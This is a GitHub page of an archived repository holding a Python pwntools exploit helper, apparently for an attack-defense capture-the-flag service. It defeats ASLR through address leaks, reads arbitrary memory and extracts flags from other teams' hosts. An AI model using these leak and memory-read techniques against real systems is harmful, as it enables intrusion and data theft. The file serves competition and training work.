This repository has been archived by the owner on May 25, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathservice3_common.py
executable file
·91 lines (75 loc) · 2.16 KB
/
service3_common.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#!/usr/bin/env python3
import pwn
import os
import sys
import re
pwn.context.timeout = 1
# pwn.context.log_level = logging.WARNING
if "LOCALHOST_RULEZ" in os.environ:
ip = "127.0.0.1"
port = 1337
else:
team_id = sys.argv[1]
ip = f"10.60.{team_id}.1"
port = 1337
def connect():
io = pwn.remote(ip, port)
io.recvuntil(
b"_______ ______ ____ ____ _____ | | ____ __ __ | | _____ _/ |_ ____ _______ \n"
)
io.recvuntil(b"The value stack is empty")
io.recvuntil(b"Ready")
return io
def extract_flags(s, print_flags=False):
l = sorted(set(re.findall("[A-Z0-9]{31}=", s.decode("latin1"))))
if print_flags:
print(f"Found {len(l)} flags")
print("\n".join(l))
return l
def deaslr1(io):
io.sendline(b"Random")
io.recvuntil(b";35m")
addx = (int(io.recvuntil(b"\x1b", drop=True)) ^ 1804289383) << 12
io.recvuntil(b"Ready")
return addx
def deaslr2(io):
io.sendline(b"0x0ddba11")
io.recvuntil(b";35m")
addx = int(io.recvuntil(b"\x1b", drop=True)) - 2800
io.recvuntil(b"Ready")
return addx
def arbitrary_read1(io, addx):
all_s = b""
try:
io.sendline(b"8192")
io.recvuntil(b"Ready")
io.sendline(str(addx).encode())
io.recvuntil(b"Ready")
io.sendline(b"[todo]Hxd")
while True:
s = io.recvline().decode("latin1")
if "Ready" in s:
break
hx = "".join(
l.replace(" ", "") for l in re.findall(r"(?:[a-f0-9]{2} ){8}", s)
)
all_s += pwn.unhex(hx)
except Exception as e:
pass
extract_flags(all_s, True)
def arbitrary_read2(io, addx, start, end):
s = b""
for i in range(start, end):
try:
io.sendline(b"Clear")
io.recvuntil(b"Ready")
io.sendline(str(addx + i * 8).encode())
io.recvuntil(b"Ready")
io.sendline(b"Peek")
io.recvuntil(b";35m")
s += pwn.p64(int(io.recvuntil(b"\x1b", drop=True)) % 2**64)
io.recvuntil(b"Ready")
except Exception:
break
extract_flags(s, True)
sys.exit()